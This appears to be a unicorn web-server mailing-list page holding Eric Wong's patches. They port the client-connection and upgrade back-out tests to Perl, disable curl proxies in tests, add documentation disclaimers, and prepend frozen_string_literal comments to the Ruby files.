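(`ccc' is the check_client_connection feature.  The hunks below
hold a slow /read_fifo request open while ~100 clients connect
to /aborted and disconnect without reading the response; the
final /nr_aborts check confirms the Rack app never ran for any
of the aborted clients.)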
---
 t/integration.ru      |  4 ++
 t/integration.t       | 33 ++++++++++++++++
 test/unit/test_ccc.rb | 92 -------------------------------------------
 3 files changed, 37 insertions(+), 92 deletions(-)
 delete mode 100644 test/unit/test_ccc.rb

diff --git a/t/integration.ru b/t/integration.ru
index a6b022a..aaed608 100644
--- a/t/integration.ru
+++ b/t/integration.ru
@@ -87,6 +87,7 @@ def rack_input_tests(env)
   [ 200, h, [ dig.hexdigest ] ]
 end
 
+$nr_aborts = 0
 run(lambda do |env|
   case env['REQUEST_METHOD']
   when 'GET'
@@ -101,7 +102,10 @@ def rack_input_tests(env)
     when '/early_hints_rack2'; early_hints(env, "r\n2")
     when '/early_hints_rack3'; early_hints(env, %w(r 3))
     when '/broken_app'; raise RuntimeError, 'hello'
+    when '/aborted'; $nr_aborts += 1; [ 200, {}, [] ]
+    when '/nr_aborts'; [ 200, { 'nr-aborts' => "#$nr_aborts" }, [] ]
     when '/nil'; nil
+    when '/read_fifo'; [ 200, {}, [ File.read(env['HTTP_READ_FIFO']) ] ]
     else '/'; [ 200, {}, [ env_dump(env) ] ]
     end # case PATH_INFO (GET)
   when 'POST'
diff --git a/t/integration.t b/t/integration.t
index 3b1d6df..2d448cd 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -405,6 +405,39 @@ EOM
 	my $wpid = readline($fifo_fh);
 	like($wpid, qr/\Apid=\d+\z/a , 'new worker ready');
 	$ck_early_hints->('ccc on');
+
+	$c = tcp_start $srv, 'GET /env_dump HTTP/1.0';
+	vec(my $rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out env_dump';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	ok $hdr, 'got all headers';
+
+	# start a slow TCP request
+	my $rfifo = "$tmpdir/rfifo";
+	mkfifo_die $rfifo;
+	$c = tcp_start $srv, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	tcp_start $srv, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'TFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'TFIN', 'got slow response from TCP socket';
+
+	# slow Unix socket request
+	$c = unix_start $u1, "GET /read_fifo HTTP/1.0\r\nRead-FIFO: $rfifo";
+	vec($rvec = '', fileno($c), 1) = 1;
+	select($rvec, undef, undef, 10) or BAIL_OUT 'timed out Unix CCC';
+	unix_start $u1, 'GET /aborted HTTP/1.0' for (1..100);
+	write_file '>', $rfifo, 'UFIN';
+	($status, $hdr) = slurp_hdr($c);
+	like $status, qr!\AHTTP/1\.[01] 200!, 'got part of first response';
+	$bdy = <$c>;
+	is $bdy, 'UFIN', 'got slow response from Unix socket';
+
+	($status, $hdr, $bdy) = do_req $srv, 'GET /nr_aborts HTTP/1.0';
+	like "@$hdr", qr/nr-aborts: 0\b/,
+		'aborted connections unseen by Rack app';
 }
 
 if ('max_header_len internal API') {
diff --git a/test/unit/test_ccc.rb b/test/unit/test_ccc.rb
deleted file mode 100644
index a0a2bff..0000000
--- a/test/unit/test_ccc.rb
+++ /dev/null
@@ -1,92 +0,0 @@
-# frozen_string_literal: false
-require 'socket'
-require 'unicorn'
-require 'io/wait'
-require 'tempfile'
-require 'test/unit'
-require './test/test_helper'
-
-class TestCccTCPI < Test::Unit::TestCase
-  def test_ccc_tcpi
-    start_pid = $$
-    host = '127.0.0.1'
-    srv = TCPServer.new(host, 0)
-    port = srv.addr[1]
-    err = Tempfile.new('unicorn_ccc')
-    rd, wr = IO.pipe
-    sleep_pipe = IO.pipe
-    pid = fork do
-      sleep_pipe[1].close
-      reqs = 0
-      rd.close
-      worker_pid = nil
-      app = lambda do |env|
-        worker_pid ||= begin
-          at_exit { wr.write(reqs.to_s) if worker_pid == $$ }
-          $$
-        end
-        reqs += 1
-
-        # will wake up when writer closes
-        sleep_pipe[0].read if env['PATH_INFO'] == '/sleep'
-
-        [ 200, {'content-length'=>'0', 'content-type'=>'text/plain'}, [] ]
-      end
-      ENV['UNICORN_FD'] = srv.fileno.to_s
-      opts = {
-        listeners: [ "#{host}:#{port}" ],
-        stderr_path: err.path,
-        check_client_connection: true,
-      }
-      uni = Unicorn::HttpServer.new(app, opts)
-      uni.start.join
-    end
-    wr.close
-
-    # make sure the server is running, at least
-    client = tcp_socket(host, port)
-    client.write("GET / HTTP/1.1\r\nHost: example.com\r\n\r\n")
-    assert client.wait(10), 'never got response from server'
-    res = client.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of response, server is ready'
-    client.close
-
-    # start a slow request...
-    sleeper = tcp_socket(host, port)
-    sleeper.write("GET /sleep HTTP/1.1\r\nHost: example.com\r\n\r\n")
-
-    # and a bunch of aborted ones
-    nr = 100
-    nr.times do |i|
-      client = tcp_socket(host, port)
-      client.write("GET /collections/#{rand(10000)} HTTP/1.1\r\n" \
-                   "Host: example.com\r\n\r\n")
-      client.close
-    end
-    sleep_pipe[1].close # wake up the reader in the worker
-    res = sleeper.read
-    assert_match %r{\AHTTP/1\.1 200}, res, 'got part of first sleeper response'
-    assert_match %r{\r\n\r\n\z}, res, 'got end of sleeper response'
-    sleeper.close
-    kpid = pid
-    pid = nil
-    Process.kill(:QUIT, kpid)
-    _, status = Process.waitpid2(kpid)
-    assert status.success?
-    reqs = rd.read.to_i
-    warn "server got #{reqs} requests with #{nr} CCC aborted\n" if $DEBUG
-    assert_operator reqs, :<, nr
-    assert_operator reqs, :>=, 2, 'first 2 requests got through, at least'
-  ensure
-    return if start_pid != $$
-    srv.close if srv
-    if pid
-      Process.kill(:QUIT, pid)
-      _, status = Process.waitpid2(pid)
-      assert status.success?
-    end
-    err.close! if err
-    rd.close if rd
-  end
-end


* [PATCH 0/4] a small pile of patches
From: Eric Wong @ 2024-03-23 19:45 UTC (permalink / raw)
  To: unicorn-public

[-- Attachment #1: Type: text/plain, Size: 4446 bytes --]

Some stuff to future-proof against upcoming Ruby incompatibilities.
More coming...

I've also pushed out preliminary work (started in 2021) to the
`pico' branch to switch the HTTP parser from Ragel to
picohttpparser.  It will simplify the build + maintenance,
especially when distros carry different Ragel versions (or don't
package it at all, as some hackers can't afford bandwidth and disk
for a C++ toolchain).

Other notes: New releases will probably be hosted on yhbt.net if
the Rubygems.org MFA threshold is reached.  Caring about the
identity of hackers is totally misguided when we already show
our code (and even document it!).  If you can't audit the code
yourself, get an actual professional to do it and don't bother
amateurs like me.

Eric Wong (4):
  t/integration: disable proxies when running curl(1)
  tests: port back-out-of-upgrade to Perl 5
  doc: various updates and disclaimers
  treewide: future-proof frozen_string_literal changes

 HACKING                             |  13 +++-
 README                              |   9 +++
 Rakefile                            |   1 +
 TODO                                |   4 +-
 bin/unicorn                         |   1 +
 bin/unicorn_rails                   |   1 +
 examples/big_app_gc.rb              |   1 +
 examples/echo.ru                    |   1 +
 examples/logger_mp_safe.rb          |   1 +
 examples/unicorn.conf.minimal.rb    |   1 +
 examples/unicorn.conf.rb            |   1 +
 ext/unicorn_http/extconf.rb         |   1 +
 lib/unicorn.rb                      |   1 +
 lib/unicorn/app/old_rails.rb        |   1 +
 lib/unicorn/app/old_rails/static.rb |   1 +
 lib/unicorn/cgi_wrapper.rb          |   1 +
 lib/unicorn/configurator.rb         |   1 +
 lib/unicorn/const.rb                |   1 +
 lib/unicorn/http_request.rb         |   1 +
 lib/unicorn/http_response.rb        |   1 +
 lib/unicorn/http_server.rb          |   1 +
 lib/unicorn/launcher.rb             |   1 +
 lib/unicorn/oob_gc.rb               |   1 +
 lib/unicorn/preread_input.rb        |   1 +
 lib/unicorn/select_waiter.rb        |   1 +
 lib/unicorn/socket_helper.rb        |   1 +
 lib/unicorn/stream_input.rb         |   1 +
 lib/unicorn/tee_input.rb            |   1 +
 lib/unicorn/tmpio.rb                |   1 +
 lib/unicorn/util.rb                 |   1 +
 lib/unicorn/worker.rb               |   1 +
 setup.rb                            |   1 +
 t/back-out-of-upgrade.t             |  44 +++++++++++
 t/broken-app.ru                     |   1 +
 t/client_body_buffer_size.ru        |   1 +
 t/detach.ru                         |   1 +
 t/env.ru                            |   1 +
 t/fails-rack-lint.ru                |   1 +
 t/heartbeat-timeout.ru              |   1 +
 t/integration.ru                    |   1 +
 t/integration.t                     |   1 +
 t/lib.perl                          |  67 ++++++++++++++---
 t/listener_names.ru                 |   1 +
 t/oob_gc.ru                         |   1 +
 t/oob_gc_path.ru                    |   1 +
 t/pid.ru                            |   1 +
 t/preread_input.ru                  |   1 +
 t/reopen-logs.ru                    |   1 +
 t/t0008-back_out_of_upgrade.sh      | 110 ----------------------------
 t/t0013.ru                          |   1 +
 t/t0014.ru                          |   1 +
 t/t0301.ru                          |   1 +
 test/aggregate.rb                   |   1 +
 test/benchmark/dd.ru                |   1 +
 test/benchmark/ddstream.ru          |   1 +
 test/benchmark/readinput.ru         |   1 +
 test/benchmark/stack.ru             |   1 +
 test/exec/test_exec.rb              |   1 +
 test/test_helper.rb                 |   1 +
 test/unit/test_ccc.rb               |   1 +
 test/unit/test_configurator.rb      |   1 +
 test/unit/test_droplet.rb           |   1 +
 test/unit/test_http_parser.rb       |   1 +
 test/unit/test_http_parser_ng.rb    |   1 +
 test/unit/test_request.rb           |   1 +
 test/unit/test_server.rb            |   1 +
 test/unit/test_signals.rb           |   1 +
 test/unit/test_socket_helper.rb     |   1 +
 test/unit/test_stream_input.rb      |   1 +
 test/unit/test_tee_input.rb         |   1 +
 test/unit/test_util.rb              |   1 +
 test/unit/test_waiter.rb            |   1 +
 unicorn.gemspec                     |   1 +
 73 files changed, 188 insertions(+), 126 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

[-- Attachment #2: 0001-t-integration-disable-proxies-when-running-curl-1.patch --]
[-- Type: text/x-diff, Size: 737 bytes --]

From f3acce5dce62ac4b0288d3c0ddf0a6db2cbd9e7f Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Tue, 9 Jan 2024 21:35:08 +0000
Subject: [PATCH 1/4] t/integration: disable proxies when running curl(1)

This was also done in t/test-lib.sh, but using '*' is more
encompassing.
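
(curl honors the NO_PROXY environment variable; setting it to '*'
disables proxying for every host, so a stray http_proxy in a
developer's environment can't redirect the loopback requests these
tests make.)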
---
 t/integration.t | 1 +
 1 file changed, 1 insertion(+)

diff --git a/t/integration.t b/t/integration.t
index 7310ff2..d17ace0 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -27,6 +27,7 @@ listen "$u1"
 EOM
 my $ar = unicorn(qw(-E none t/integration.ru -c), $u_conf, { 3 => $srv });
 my $curl = which('curl');
+local $ENV{NO_PROXY} = '*'; # for curl
 my $fifo = "$tmpdir/fifo";
 POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
 my %PUT = (

[-- Attachment #3: 0002-tests-port-back-out-of-upgrade-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8889 bytes --]

From 724fb631c76f09964ec289ee8e144886ba15d380 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 6 Nov 2023 05:45:29 +0000
Subject: [PATCH 2/4] tests: port back-out-of-upgrade to Perl 5

Another place where we can be faster without adding more
dependence on Ruby maintaining stable behavior.
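
(The test exercises backing out of a USR2 upgrade: USR2 spawns a
new master, WINCH drops the old master's workers, then HUP on the
old master respawns its workers and QUIT kills the new master,
leaving the original master serving requests again.)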
---
 t/back-out-of-upgrade.t        |  44 +++++++++++++
 t/lib.perl                     |  67 +++++++++++++++++---
 t/t0008-back_out_of_upgrade.sh | 110 ---------------------------------
 3 files changed, 102 insertions(+), 119 deletions(-)
 create mode 100644 t/back-out-of-upgrade.t
 delete mode 100755 t/t0008-back_out_of_upgrade.sh

diff --git a/t/back-out-of-upgrade.t b/t/back-out-of-upgrade.t
new file mode 100644
index 0000000..cf3b09f
--- /dev/null
+++ b/t/back-out-of-upgrade.t
@@ -0,0 +1,44 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+# test backing out of USR2 upgrade
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $srv = tcp_server();
+mkfifo_die $fifo;
+write_file '>', $u_conf, <<EOM;
+preload_app true
+stderr_path "$err_log"
+pid "$pid_file"
+after_fork { |s,w| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+my $ar = unicorn(qw(-E none t/pid.ru -c), $u_conf, { 3 => $srv });
+
+like(my $wpid_orig_1 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker pid');
+
+ok $ar->do_kill('USR2'), 'USR2 to start upgrade';
+ok $ar->do_kill('WINCH'), 'drop old worker';
+
+like(my $wpid_new = slurp($fifo), qr/\Apid=\d+\z/a, 'got pid from new master');
+chomp(my $new_pid = slurp($pid_file));
+isnt $new_pid, $ar->{pid}, 'PID file changed';
+chomp(my $pid_oldbin = slurp("$pid_file.oldbin"));
+is $pid_oldbin, $ar->{pid}, '.oldbin PID valid';
+
+ok $ar->do_kill('HUP'), 'HUP old master';
+like(my $wpid_orig_2 = slurp($fifo), qr/\Apid=\d+\z/a, 'got worker new pid');
+ok kill('QUIT', $new_pid), 'abort new master';
+kill_until_dead $new_pid;
+
+my ($st, $hdr, $req_pid) = do_req $srv, 'GET /';
+chomp $req_pid;
+is $wpid_orig_2, "pid=$req_pid", 'new worker on old worker serves';
+
+ok !-f "$pid_file.oldbin", '.oldbin PID file gone';
+chomp(my $old_pid = slurp($pid_file));
+is $old_pid, $ar->{pid}, 'PID file restored';
+
+my @log = grep !/ERROR -- : reaped .*? exec\(\)-ed/, slurp($err_log);
+check_stderr @log;
+undef $tmpdir;
+done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 9254b23..b20a2c6 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -6,30 +6,58 @@ use v5.14;
 use parent qw(Exporter);
 use autodie;
 use Test::More;
+use Socket qw(SOMAXCONN);
 use Time::HiRes qw(sleep time);
 use IO::Socket::INET;
+use IO::Socket::UNIX;
+use Carp qw(croak);
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh, $err_log, $u_sock, $u_conf, $daemon_pid,
-	$pid_file);
+	$pid_file, $wtest_sock, $fifo);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn
 	$tmpdir $errfh $err_log $u_sock $u_conf $daemon_pid $pid_file
+	$wtest_sock $fifo
 	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr
-	do_req stop_daemon sleep time);
+	do_req stop_daemon sleep time mkfifo_die kill_until_dead write_file);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
+
+$wtest_sock = "$tmpdir/wtest.sock";
 $err_log = "$tmpdir/err.log";
 $pid_file = "$tmpdir/pid";
+$fifo = "$tmpdir/fifo";
 $u_sock = "$tmpdir/u.sock";
 $u_conf = "$tmpdir/u.conf.rb";
 open($errfh, '>>', $err_log);
 
+if (my $t = $ENV{TAIL}) {
+	my @tail = $t =~ /tail/ ? split(/\s+/, $t) : (qw(tail -F));
+	push @tail, $err_log;
+	my $pid = fork;
+	if ($pid == 0) {
+		open STDOUT, '>&', \*STDERR;
+		exec @tail;
+		die "exec(@tail): $!";
+	}
+	say "# @tail";
+	sleep 0.2;
+	UnicornTest::AutoReap->new($pid);
+}
+
+sub kill_until_dead ($;%) {
+	my ($pid, %opt) = @_;
+	my $tries = $opt{tries} // 1000;
+	my $sig = $opt{sig} // 0;
+	while (CORE::kill($sig, $pid) && --$tries) { sleep(0.01) }
+	$tries or croak "PID: $pid died after signal ($sig)";
+}
+
 sub stop_daemon (;$) {
 	my ($is_END) = @_;
 	kill('TERM', $daemon_pid);
-	my $tries = 1000;
-	while (CORE::kill(0, $daemon_pid) && --$tries) { sleep(0.01) }
+	kill_until_dead $daemon_pid;
 	if ($is_END && CORE::kill(0, $daemon_pid)) { # after done_testing
 		CORE::kill('KILL', $daemon_pid);
 		die "daemon_pid=$daemon_pid did not die";
@@ -44,8 +72,9 @@ END {
 	stop_daemon(1) if defined $daemon_pid;
 };
 
-sub check_stderr () {
-	my @log = slurp($err_log);
+sub check_stderr (@) {
+	my @log = @_;
+	@log = slurp($err_log) if !@log;
 	diag("@log") if $ENV{V};
 	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
 	@err = grep(!/failed to set accept_filter=/, @err);
@@ -63,6 +92,16 @@ sub slurp_hdr {
 	($status, \@hdr);
 }
 
+sub unix_server (;$@) {
+	my $l = shift // $u_sock;
+	IO::Socket::UNIX->new(Listen => SOMAXCONN, Local => $l, Blocking => 0,
+				Type => SOCK_STREAM, @_);
+}
+
+sub unix_connect ($) {
+	IO::Socket::UNIX->new(Peer => $_[0], Type => SOCK_STREAM);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
@@ -95,8 +134,7 @@ sub tcp_host_port {
 
 sub unix_start ($@) {
 	my ($dst, @req) = @_;
-	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
-		BAIL_OUT "unix connect $dst: $!";
+	my $s = unix_connect($dst) or BAIL_OUT "unix connect $dst: $!";
 	$s->autoflush(1);
 	print $s @req, "\r\n\r\n" if @req;
 	$s;
@@ -201,7 +239,7 @@ sub unicorn {
 	state $ver = $ENV{TEST_RUBY_VERSION} // `$ruby -e 'print RUBY_VERSION'`;
 	state $eng = $ENV{TEST_RUBY_ENGINE} // `$ruby -e 'print RUBY_ENGINE'`;
 	state $ext = File::Spec->rel2abs("test/$eng-$ver/ext/unicorn_http");
-	state $exe = File::Spec->rel2abs('bin/unicorn');
+	state $exe = File::Spec->rel2abs("test/$eng-$ver/bin/unicorn");
 	my $pid = spawn(\%env, $ruby, '-I', $lib, '-I', $ext, $exe, @args);
 	UnicornTest::AutoReap->new($pid);
 }
@@ -219,6 +257,17 @@ sub do_req ($@) {
 	($status, $hdr, $bdy);
 }
 
+sub mkfifo_die ($;$) {
+	POSIX::mkfifo($_[0], $_[1] // 0600) or croak "mkfifo: $!";
+}
+
+sub write_file ($$@) { # mode, filename, LIST (for print)
+	open(my $fh, shift, shift);
+	print $fh @_;
+	# return $fh for further writes if user wants it:
+	defined(wantarray) && !wantarray ? $fh : close $fh;
+}
+
 # automatically kill + reap children when this goes out-of-scope
 package UnicornTest::AutoReap;
 use v5.14;
diff --git a/t/t0008-back_out_of_upgrade.sh b/t/t0008-back_out_of_upgrade.sh
deleted file mode 100755
index 96d4057..0000000
--- a/t/t0008-back_out_of_upgrade.sh
+++ /dev/null
@@ -1,110 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 13 "backout of USR2 upgrade"
-
-worker_wait_start () {
-	test xSTART = x"$(cat $fifo)"
-	unicorn_pid=$(cat $pid)
-}
-
-t_begin "setup and start" && {
-	unicorn_setup
-	rm -f $pid.oldbin
-
-cat >> $unicorn_config <<EOF
-after_fork do |server, worker|
-  # test script will block while reading from $fifo,
-  # so notify the script on the first worker we spawn
-  # by opening the FIFO
-  if worker.nr == 0
-    File.open("$fifo", "wb") { |fp| fp.syswrite "START" }
-  end
-end
-EOF
-	unicorn -D -c $unicorn_config pid.ru
-	worker_wait_start
-	orig_master_pid=$unicorn_pid
-}
-
-t_begin "read original worker pid" && {
-	orig_worker_pid=$(curl -sSf http://$listen/)
-	test -n "$orig_worker_pid" && kill -0 $orig_worker_pid
-}
-
-t_begin "upgrade to new master" && {
-	kill -USR2 $orig_master_pid
-}
-
-t_begin "kill old worker" && {
-	kill -WINCH $orig_master_pid
-}
-
-t_begin "wait for new worker to start" && {
-	worker_wait_start
-	test $unicorn_pid -ne $orig_master_pid
-	new_master_pid=$unicorn_pid
-}
-
-t_begin "old master pid is stashed in $pid.oldbin" && {
-	test -s "$pid.oldbin"
-	test $orig_master_pid -eq $(cat $pid.oldbin)
-}
-
-t_begin "ensure old worker is no longer running" && {
-	i=0
-	while kill -0 $orig_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "capture pid of new worker" && {
-	new_worker_pid=$(curl -sSf http://$listen/)
-}
-
-t_begin "reload old master process" && {
-	kill -HUP $orig_master_pid
-	worker_wait_start
-}
-
-t_begin "gracefully kill new master and ensure it dies" && {
-	kill -QUIT $new_master_pid
-	i=0
-	while kill -0 $new_worker_pid 2>/dev/null
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid.oldbin does not exist" && {
-	i=0
-	while test -s $pid.oldbin
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-	while ! test -s $pid
-	do
-		i=$(( $i + 1 ))
-		test $i -lt 600 || die "timed out"
-		sleep 1
-	done
-}
-
-t_begin "ensure $pid is correct" && {
-	cur_master_pid=$(cat $pid)
-	test $orig_master_pid -eq $cur_master_pid
-}
-
-t_begin "killing succeeds" && {
-	kill $orig_master_pid
-}
-
-dbgcat r_err
-
-t_done

[-- Attachment #4: 0003-doc-various-updates-and-disclaimers.patch --]
[-- Type: text/x-diff, Size: 3343 bytes --]

From 69d15a7a51a096b6acf00ccf23e1b988076d3b5f Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Mon, 1 Jan 2024 10:43:13 +0000
Subject: [PATCH 3/4] doc: various updates and disclaimers

Covering my ass from draconian legislation.
---
 HACKING | 13 +++++++++----
 README  |  9 +++++++++
 TODO    |  4 +---
 3 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/HACKING b/HACKING
index 5aca83e..777e75e 100644
--- a/HACKING
+++ b/HACKING
@@ -6,6 +6,8 @@ Like Mongrel, we use Ruby where it makes sense, and Ragel with C where
 it helps performance.  All of the code that actually runs your Rack
 application is written Ruby, Ragel or C.
 
+Ragel may be dropped in favor of a picohttpparser-based one in the future.
+
 As far as tests and documentation goes, we're not afraid to embrace Unix
 and use traditional Unix tools where they make sense and get the job
 done.
@@ -16,6 +18,9 @@ Tests are good, but slow tests make development slow, so we make tests
 faster (in parallel) with GNU make (instead of Rake) and avoiding
 RubyGems.
 
+New tests are written in Perl 5 and use TAP <https://testanything.org/>
+to ensure stability and immunity from Ruby incompatibilities.
+
 Users of GNU-based systems (such as GNU/Linux) usually have GNU make
 installed as "make" instead of "gmake".
 
@@ -69,10 +74,10 @@ supported by the versions of Ruby we target.
 
 === Ragel Compatibility
 
-We target the latest released version of Ragel and will update our code
-to keep up with new releases.  Packaged tarballs and gems include the
-generated source code so they will remain usable if compatibility is
-broken.
+We target the latest released version of Ragel in Debian and will update
+our code to keep up with new releases.  Packaged tarballs and gems
+include the generated source code so they will remain usable if
+compatibility is broken.
 
 == Contributing
 
diff --git a/README b/README
index 84c0fdf..b60ed00 100644
--- a/README
+++ b/README
@@ -122,6 +122,7 @@ supported.  Run `unicorn -h` to see command-line options.
 
 There is NO WARRANTY whatsoever if anything goes wrong, but
 {let us know}[link:ISSUES.html] and maybe someone can fix it.
+No commercial support will ever be provided by the amateur maintainer.
 
 unicorn is designed to only serve fast clients either on the local host
 or a fast LAN.  See the PHILOSOPHY and DESIGN documents for more details
@@ -132,6 +133,14 @@ damage done to the entire Ruby ecosystem.  Its unintentional popularity
 set Ruby back decades in parallelism, concurrency and robustness since
 it prolongs and proliferates the existence of poorly-written code.
 
+unicorn hackers are NOT responsible for your supply chain security:
+read and understand it yourself or get someone you trust to audit it.
+Malicious commits and releases will be made if under duress.  The only
+defense you'll ever have is from reviewing the source code.
+
+No user or contributor will ever be expected to sacrifice their own
+security by running JavaScript or revealing any personal information.
+
 == Contact
 
 All feedback (bug reports, user/development discussion, patches, pull
diff --git a/TODO b/TODO
index ebbccdc..a3b18fd 100644
--- a/TODO
+++ b/TODO
@@ -1,3 +1 @@
-* Documentation improvements
-
-* improve test suite
+* improve test suite (port to Perl 5 for stability and maintainability)

[-- Attachment #5: 0004-treewide-future-proof-frozen_string_literal-changes.patch --]
[-- Type: text/x-diff, Size: 24100 bytes --]

From ccf2443901c18ffb26b2785f52d921005e862167 Mon Sep 17 00:00:00 2001
From: Eric Wong <bofh@yhbt.net>
Date: Thu, 8 Feb 2024 12:16:31 +0000
Subject: [PATCH 4/4] treewide: future-proof frozen_string_literal changes

Once again Ruby seems ready to introduce more incompatibilities
and force busywork upon maintainers[1].  In order to avoid
incompatibilities in the future, I used a Perl script[2] to
prepend `frozen_string_literal: false' to every Ruby file.

Somebody interested will have to go through every Ruby source
file and enable frozen_string_literal once they've thoroughly
verified it's safe to do so.

[1] https://bugs.ruby-lang.org/issues/20205
[2] https://yhbt.net/add-fsl.git/74d7689/s/?b=add-fsl.perl
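
A rough sketch of the idea (illustration only; NOT the actual
add-fsl.perl script referenced in [2]):

	#!perl -w
	use v5.14;
	use autodie;
	for my $f (@ARGV) {
		open my $in, '<', $f;
		my @l = <$in>;
		# skip files somebody already annotated
		next if grep /^#\s*frozen_string_literal:/, @l;
		# keep a shebang and/or -*- encoding -*- comment first
		my $i = 0;
		$i++ while $i < @l && $l[$i] =~ /\A#(?:!|\s*-\*-)/;
		splice @l, $i, 0, "# frozen_string_literal: false\n";
		open my $out, '>', $f;
		print $out @l;
		close $out;
	}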
---
 Rakefile                            | 1 +
 bin/unicorn                         | 1 +
 bin/unicorn_rails                   | 1 +
 examples/big_app_gc.rb              | 1 +
 examples/echo.ru                    | 1 +
 examples/logger_mp_safe.rb          | 1 +
 examples/unicorn.conf.minimal.rb    | 1 +
 examples/unicorn.conf.rb            | 1 +
 ext/unicorn_http/extconf.rb         | 1 +
 lib/unicorn.rb                      | 1 +
 lib/unicorn/app/old_rails.rb        | 1 +
 lib/unicorn/app/old_rails/static.rb | 1 +
 lib/unicorn/cgi_wrapper.rb          | 1 +
 lib/unicorn/configurator.rb         | 1 +
 lib/unicorn/const.rb                | 1 +
 lib/unicorn/http_request.rb         | 1 +
 lib/unicorn/http_response.rb        | 1 +
 lib/unicorn/http_server.rb          | 1 +
 lib/unicorn/launcher.rb             | 1 +
 lib/unicorn/oob_gc.rb               | 1 +
 lib/unicorn/preread_input.rb        | 1 +
 lib/unicorn/select_waiter.rb        | 1 +
 lib/unicorn/socket_helper.rb        | 1 +
 lib/unicorn/stream_input.rb         | 1 +
 lib/unicorn/tee_input.rb            | 1 +
 lib/unicorn/tmpio.rb                | 1 +
 lib/unicorn/util.rb                 | 1 +
 lib/unicorn/worker.rb               | 1 +
 setup.rb                            | 1 +
 t/broken-app.ru                     | 1 +
 t/client_body_buffer_size.ru        | 1 +
 t/detach.ru                         | 1 +
 t/env.ru                            | 1 +
 t/fails-rack-lint.ru                | 1 +
 t/heartbeat-timeout.ru              | 1 +
 t/integration.ru                    | 1 +
 t/listener_names.ru                 | 1 +
 t/oob_gc.ru                         | 1 +
 t/oob_gc_path.ru                    | 1 +
 t/pid.ru                            | 1 +
 t/preread_input.ru                  | 1 +
 t/reopen-logs.ru                    | 1 +
 t/t0013.ru                          | 1 +
 t/t0014.ru                          | 1 +
 t/t0301.ru                          | 1 +
 test/aggregate.rb                   | 1 +
 test/benchmark/dd.ru                | 1 +
 test/benchmark/ddstream.ru          | 1 +
 test/benchmark/readinput.ru         | 1 +
 test/benchmark/stack.ru             | 1 +
 test/exec/test_exec.rb              | 1 +
 test/test_helper.rb                 | 1 +
 test/unit/test_ccc.rb               | 1 +
 test/unit/test_configurator.rb      | 1 +
 test/unit/test_droplet.rb           | 1 +
 test/unit/test_http_parser.rb       | 1 +
 test/unit/test_http_parser_ng.rb    | 1 +
 test/unit/test_request.rb           | 1 +
 test/unit/test_server.rb            | 1 +
 test/unit/test_signals.rb           | 1 +
 test/unit/test_socket_helper.rb     | 1 +
 test/unit/test_stream_input.rb      | 1 +
 test/unit/test_tee_input.rb         | 1 +
 test/unit/test_util.rb              | 1 +
 test/unit/test_waiter.rb            | 1 +
 unicorn.gemspec                     | 1 +
 66 files changed, 66 insertions(+)

diff --git a/Rakefile b/Rakefile
index 37569ce..fe1588b 100644
--- a/Rakefile
+++ b/Rakefile
@@ -1,3 +1,4 @@
+# frozen_string_literal: false
 # optional rake-compiler support in case somebody needs to cross compile
 begin
   mk = "ext/unicorn_http/Makefile"
diff --git a/bin/unicorn b/bin/unicorn
index 00c8464..af8353c 100755
--- a/bin/unicorn
+++ b/bin/unicorn
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 
diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index 354c1df..374fd8e 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -1,5 +1,6 @@
 #!/this/will/be/overwritten/or/wrapped/anyways/do/not/worry/ruby
 # -*- encoding: binary -*-
+# frozen_string_literal: false
 require 'unicorn/launcher'
 require 'optparse'
 require 'fileutils'
